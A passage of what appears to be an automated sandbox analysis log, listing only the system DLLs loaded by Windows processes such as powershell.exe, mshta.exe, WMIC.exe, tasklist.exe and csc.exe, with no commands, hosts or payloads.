Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
